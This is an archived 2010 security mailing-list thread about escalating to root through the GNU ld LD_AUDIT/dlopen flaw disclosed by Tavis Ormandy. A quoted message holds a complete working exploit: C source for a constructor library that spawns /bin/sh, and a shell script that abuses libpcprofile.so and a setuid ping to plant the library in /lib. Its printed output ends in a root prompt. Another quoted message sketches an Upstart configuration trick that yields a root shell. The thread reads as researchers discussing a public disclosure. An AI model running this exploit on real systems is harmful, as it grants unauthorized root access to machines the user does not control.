PaulDotCom mailing list archives
Re: Privilege scalation with GNU ld dlopen
From: Xavier Garcia <xavi.garcia () gmail com>
Date: Tue, 9 Nov 2010 17:19:48 +0100
Hi, One should be safe because users need admin rights to write there, but playing with setuid binaries is always dangerous. This could be enforced by implementing a 'secure level' in the kernel, but then the maintenance of the system could be a nightmare. Imagine having to reboot a critical server just because the 'secure level' must be desabled in order to install patches :) Regards, Xavier Garcia On Tue, Nov 09, 2010 at 09:57:37AM -0500, Nicholas B. wrote:
One would hope a system didn't allow just anyone to write to /lib/ On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <xavi.garcia () gmail com> wrote:Hi guys, I finally found an easier way to gain root privileges, without rebooting the computer. The vulnerability can be used to upload a custom library to the server and then execute a root shell. The library is really simple (libevil.so) ---- #include <errno.h> #include <unistd.h> static void __attribute__ ((constructor)) install (void) { execl("/bin/sh", "/bin/sh", (char *) 0); } ---- user@host:~/$ cat ./run.sh umask 0 gcc -c -fPIC evil.c -o evil.o gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping cat ./libevil.so > /lib/libevil.so LD_AUDIT="libevil.so" ping user@host:~/$ sh run.sh ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface] [-M pmtudisc-hint] [-m mark] [-S sndbuf] [-T tstamp-options] [-Q tos] [hop1 ...] destination # whoami root # I hope it is helpful. Regards, Xavier Garcia On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:Hi guys, I am trying to find some ways to gain root access by using the vulnerability described in the advisory http://marc.info/?l=full-disclosure&m=128776663124692&w=2 published by Tavis Ormandy. The advisory states that Cron can be used to scalate privileges, but Cron does not accept files that are writable by the group or others, returning the error BAD FILE MODE. I have been looking for alternative ways to gain root access, but there are not many places where it is possible. I have found that Upstart (http://en.wikipedia.org/wiki/Upstart) does not check the permissions and happily reads the configuration files every time it restarts. This means that we can create a configuration file that will instruct Upstart to drop a root shell :) The down side is that we have to be patient and wait until the computer is rebooted, or use some social engineering. You can find more details athttp://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.htmlI hope this finding is interesting or usefull for the list. Regards, Xavier Garcia_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Privilege scalation with GNU ld dlopen Xavier Garcia (Nov 05)
- Re: Privilege scalation with GNU ld dlopen Xavier Garcia (Nov 09)
- Re: Privilege scalation with GNU ld dlopen Nicholas B. (Nov 09)
- Re: Privilege scalation with GNU ld dlopen Xavier Garcia (Nov 09)
- Re: Privilege scalation with GNU ld dlopen Joshua Wright (Nov 10)
- Re: Privilege scalation with GNU ld dlopen Mike Patterson (Nov 10)
- Re: Privilege scalation with GNU ld dlopen Mike Patterson (Nov 10)
- Re: Privilege scalation with GNU ld dlopen Xavi Garcia (Nov 10)
- Re: Privilege scalation with GNU ld dlopen Nicholas B. (Nov 09)
- Re: Privilege scalation with GNU ld dlopen Xavier Garcia (Nov 09)